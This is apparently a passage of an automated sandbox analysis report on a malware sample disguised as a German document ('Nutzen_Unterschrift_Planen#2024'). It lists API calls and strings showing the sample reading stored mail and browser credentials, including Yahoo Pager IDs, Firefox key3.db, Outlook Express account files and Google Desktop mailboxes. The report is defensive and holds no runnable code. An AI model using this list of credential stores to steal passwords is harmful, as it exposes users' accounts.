                                                              • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                              • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValuememset
                                                            • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                            • API String ID: 1830152886-1703613266
                                                            APIs
                                                            • GetLastError.KERNEL32(?), ref: 00406D87
                                                            • sprintf.MSVCRT ref: 00406DAF
                                                            • MessageBoxA.USER32(00000000,?,Error,00000030), ref: 00406DC8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastMessagesprintf
                                                            • String ID: Error$Error %d: %s
                                                            • API String ID: 1670431679-1552265934
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,752671C0,00405EC6,00000000), ref: 00410FA2
                                                            • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00410FB0
                                                            • FreeLibrary.KERNEL32(00000000), ref: 00410FC8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Library$AddressFreeLoadProc
                                                            • String ID: SHAutoComplete$shlwapi.dll
                                                            • API String ID: 145871493-1506664499
                                                            APIs
                                                            • memset.MSVCRT ref: 0043DFC5
                                                            • memset.MSVCRT ref: 0043DFFE
                                                            • memcpy.MSVCRT(00000001,B2850F59,00000000,?,00000001,00000000), ref: 0043E27C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$memcpy
                                                            • String ID: $no query solution
                                                            • API String ID: 368790112-326442043
                                                            APIs
                                                            Strings
                                                            • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                            • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                            • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                            • API String ID: 3510742995-272990098
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID: H
                                                            • API String ID: 2221118986-2852464175
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                            • API String ID: 3510742995-3170954634
                                                            APIs
                                                              • Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C
                                                            • memcmp.MSVCRT(?,?,00000004,00000000,?,?,0041DE5E,?,?,?,?,00436073), ref: 0041DBAE
                                                            • memcmp.MSVCRT(?,SQLite format 3,00000010,00000000,?,?,0041DE5E,?,?,?), ref: 0041DBDB
                                                            • memcmp.MSVCRT(?,@ ,00000003,?,?,?,00000000,?,?,0041DE5E,?,?,?), ref: 0041DC47
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcmp$memcpy
                                                            • String ID: @ $SQLite format 3
                                                            • API String ID: 231171946-3708268960
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset
                                                            • String ID: winWrite1$winWrite2
                                                            • API String ID: 438689982-3457389245
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpymemset
                                                            • String ID: winRead
                                                            • API String ID: 1297977491-2759563040
                                                            APIs
                                                            • memset.MSVCRT ref: 0044955B
                                                            • memset.MSVCRT ref: 0044956B
                                                            • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                            • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpymemset
                                                            • String ID: gj
                                                            • API String ID: 1297977491-4203073231
                                                            APIs
                                                              • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                              • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,75D50A60,00000000,?,?,0040A7BE,00000001,0044CBC0,75D50A60), ref: 00406D4D
                                                            • memset.MSVCRT ref: 0040AB9C
                                                              • Part of subcall function 00411004: memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                              • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                              • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                            • sprintf.MSVCRT ref: 0040ABE1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                            • String ID: <%s>%s</%s>$</item>$<item>
                                                            • API String ID: 3337535707-2769808009
                                                            APIs
                                                            • GetParent.USER32(?), ref: 004090C2
                                                            • GetWindowRect.USER32(?,?), ref: 004090CF
                                                            • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Window$Rect$ClientParentPoints
                                                            • String ID:
                                                            • API String ID: 4247780290-0
                                                            APIs
                                                            • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                              • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                                              • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                            • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                              • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                              • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                              • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                              • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                            • SetCursor.USER32(?,?,0040CBD2), ref: 0040B9F9
                                                            • SetFocus.USER32(?,?,?,0040CBD2), ref: 0040BA0B
                                                            • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                            Similarity
                                                            • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                            • String ID:
                                                            • API String ID: 2374668499-0
                                                            APIs
                                                            • memset.MSVCRT ref: 0040AD5B
                                                            • memset.MSVCRT ref: 0040AD71
                                                              • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                              • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,75D50A60,00000000,?,?,0040A7BE,00000001,0044CBC0,75D50A60), ref: 00406D4D
                                                              • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                              • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                            • sprintf.MSVCRT ref: 0040ADA8
                                                            Strings
                                                            • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AD76
                                                            • <%s>, xrefs: 0040ADA2
                                                            Similarity
                                                            • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                            • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                            • API String ID: 3699762281-1998499579
                                                            APIs
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75D50A60,?,00000000), ref: 00409A3E
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75D50A60,?,00000000), ref: 00409A4C
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75D50A60,?,00000000), ref: 00409A5D
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75D50A60,?,00000000), ref: 00409A74
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75D50A60,?,00000000), ref: 00409A7D
                                                            Similarity
                                                            • API ID: ??3@
                                                            • String ID:
                                                            • API String ID: 613200358-0
                                                            APIs
                                                              • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75D50A60,?,00000000), ref: 00409A3E
                                                              • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75D50A60,?,00000000), ref: 00409A4C
                                                              • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75D50A60,?,00000000), ref: 00409A5D
                                                              • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75D50A60,?,00000000), ref: 00409A74
                                                              • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75D50A60,?,00000000), ref: 00409A7D
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
                                                            • free.MSVCRT ref: 00409B00
                                                              • Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C
                                                            Similarity
                                                            • API ID: ??3@$free
                                                            • String ID:
                                                            • API String ID: 2241099983-0
                                                            APIs
                                                              • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                              • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                              • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                            • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                            • GetSysColor.USER32(00000005), ref: 004107A6
                                                            • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                            • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                            • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                            Similarity
                                                            • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                            • String ID:
                                                            • API String ID: 2775283111-0
                                                            APIs
                                                            • BeginDeferWindowPos.USER32(0000000A), ref: 00405F6C
                                                              • Part of subcall function 004015F4: GetDlgItem.USER32(?,?), ref: 00401604
                                                              • Part of subcall function 004015F4: GetClientRect.USER32(?,?), ref: 00401616
                                                              • Part of subcall function 004015F4: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401680
                                                            • EndDeferWindowPos.USER32(?), ref: 0040602B
                                                            • InvalidateRect.USER32(?,?,00000001), ref: 00406036
                                                            Similarity
                                                            • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                            • String ID: $
                                                            • API String ID: 2498372239-3993045852
                                                            APIs
                                                              • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                            • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                                            • CloseHandle.KERNEL32(?,?,00406C55,00000000,?,00000000,?), ref: 00406B11
                                                              • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
                                                              • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407917
                                                              • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                            Similarity
                                                            • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                            • String ID: Ul@$key3.db
                                                            • API String ID: 1968906679-1563549157
                                                            APIs
                                                            • _strcmpi.MSVCRT ref: 0040E134
                                                            • _strcmpi.MSVCRT ref: 0040E14D
                                                            • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                            Similarity
                                                            • API ID: _strcmpi$_mbscpy
                                                            • String ID: smtp
                                                            • API String ID: 2625860049-60245459
                                                            APIs
                                                              • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                            • memset.MSVCRT ref: 00408258
                                                              • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                            Strings
                                                            • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                            Similarity
                                                            • API ID: Close$EnumOpenmemset
                                                            • String ID: Software\Google\Google Desktop\Mailboxes
                                                            • API String ID: 2255314230-2212045309
                                                            APIs
                                                            • memset.MSVCRT ref: 0040C28C
                                                            • SetFocus.USER32(?,?), ref: 0040C314
                                                              • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                            Similarity
                                                            • API ID: FocusMessagePostmemset
                                                            • String ID: S_@$l
                                                            • API String ID: 3436799508-4018740455
                                                            APIs
                                                            Similarity
                                                            • API ID: _mbscpy
                                                            • String ID: C^@$X$ini
                                                            • API String ID: 714388716-917056472
                                                            APIs
                                                              • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                              • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                            • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                            • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                            • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                            • String ID: MS Sans Serif
                                                            • API String ID: 3492281209-168460110
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ClassName_strcmpimemset
                                                            • String ID: edit
                                                            • API String ID: 275601554-2167791130
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: strlen$_mbscat
                                                            • String ID: 3CD
                                                            • API String ID: 3951308622-1938365332
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _mbscat$_mbscpy
                                                            • String ID: Password2
                                                            • API String ID: 2600922555-1856559283
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,75D50A60,?,00000000), ref: 00410D1C
                                                            • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                            • API String ID: 2574300362-543337301
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID: rows deleted
                                                            • API String ID: 2221118986-571615504
                                                            APIs
                                                            • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041BC7F
                                                            • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BC95
                                                            • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BCA4
                                                            • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041BCEC
                                                            • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041BD07
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memcmp
                                                            • String ID:
                                                            • API String ID: 3384217055-0
                                                            APIs
                                                              • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                            • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                            • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@$memset
                                                            • String ID:
                                                            • API String ID: 1860491036-0
                                                            APIs
                                                            • memset.MSVCRT ref: 004048C2
                                                            • memset.MSVCRT ref: 004048D6
                                                            • memset.MSVCRT ref: 004048EA
                                                            • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                            • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$memcpy
                                                            • String ID:
                                                            • API String ID: 368790112-0
                                                            APIs
                                                            • memset.MSVCRT ref: 0040D2C2
                                                            • memset.MSVCRT ref: 0040D2D8
                                                            • memset.MSVCRT ref: 0040D2EA
                                                            • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                            • memset.MSVCRT ref: 0040D319
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$memcpy
